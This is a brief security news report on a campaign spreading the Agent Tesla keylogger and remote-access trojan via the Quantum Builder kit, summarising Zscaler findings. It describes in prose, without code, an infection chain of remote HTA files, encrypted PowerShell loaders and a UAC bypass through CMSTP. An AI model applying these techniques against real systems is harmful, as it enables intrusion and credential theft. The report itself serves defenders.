Researchers have laid bare a campaign spreading the popular DotNET-based keylogger and RAT known as Agent Tesla. The information stealer is spreading via Quantum Builder which is being sold on the dark web.
Quantum Builder and Agent Tesla
Researchers from Zscaler revealed that attackers use Quantum Builder to create malicious LNK, HTA, and PowerShell payloads for Agent Tesla.
- The payloads employ sophisticated techniques such as LOLBins, decoys, UAC prompts, and in-memory PowerShell to run the final payload. These techniques are regularly updated by the developers.
- Subsequently, in-memory PowerShell scripts are decrypted by Quantum Builder-created HTA file to perform UAC Bypass. It is done via CMSTP for running the final payload (Agent Tesla) with admin rights.
Infection chain
- Upon execution, a PowerShell code gets MSHTA to run the HTA File hosted on the remote server.
- The HTA file decrypts a PowerShell loader script that decrypts and loads another PowerShell script after carrying out AES Decryption and GZIP Decompression.
- The decrypted script is the Downloader PS Script that first downloads the Agent Tesla binary from a remote server. Later, it is executed with admin privileges by performing UAC Bypass using CMSTP.
Conclusion
This campaign delivering Agent Tesla is the latest in the list of malware threats that are using Quantum Builder to stay undetected. Previously, Emotet, Bumblebee, Qbot, and IcedID have been spotted adopting the tactic. Developers continue to make efforts to make this malware more efficient.
Publisher
/https://cyware-ent.s3.amazonaws.com/image_bank/b431_shutterstock_1931461127.jpg)
/https://cyware-ent.s3.amazonaws.com/image_bank/9ae7_shutterstock_1329983519.jpg)
